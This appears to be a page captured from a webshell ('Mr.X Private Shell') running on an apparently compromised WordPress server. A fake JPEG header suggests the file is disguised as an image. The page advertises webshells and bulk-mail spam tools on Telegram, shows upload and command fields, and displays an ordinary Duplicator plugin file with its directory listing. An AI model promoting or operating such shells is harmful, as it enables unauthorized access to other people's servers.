����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

chassiw@216.73.217.25: ~ $
<?php
defined("ABSPATH") or die("");

// Exit if accessed directly
if (! defined('DUPLICATOR_VERSION')) exit;

class DUP_Shell_U
{
    /**
     * Escape a string to be used as a shell argument with bypass support for Windows
     *
     * 	NOTES:
     * 		Provides a way to support shell args on Windows OS and allows %,! on Windows command line
     * 		Safe if input is know such as a defined constant and not from user input escape shellarg
     * 		on Windows with turn %,! into spaces
     *
     * @return string
     */
    public static function escapeshellargWindowsSupport($string)
    {
        if (strncasecmp(PHP_OS, 'WIN', 3) == 0) {
            if (strstr($string, '%') || strstr($string, '!')) {
                $result = '"'.str_replace('"', '', $string).'"';
                return $result;
            }
        }
        return escapeshellarg($string);
    }

    public static function isPopenEnabled() { 
        if (!function_exists('popen') || !function_exists('proc_open')) { 
            $ret = false; 
        } else { 
            $ret = true; 
        } 
        $ret = apply_filters('duplicator_pro_is_popen_enabled', $ret); 
        return $ret; 
    }
}

Filemanager

Name Type Size Permission Actions
class.u.json.php File 5.17 KB 0644
class.u.multisite.php File 1.18 KB 0644
class.u.php File 20.96 KB 0644
class.u.scancheck.php File 5 KB 0644
class.u.shell.php File 1.16 KB 0644
class.u.string.php File 2.96 KB 0644
class.u.validator.php File 5.61 KB 0644
class.u.zip.php File 5.36 KB 0644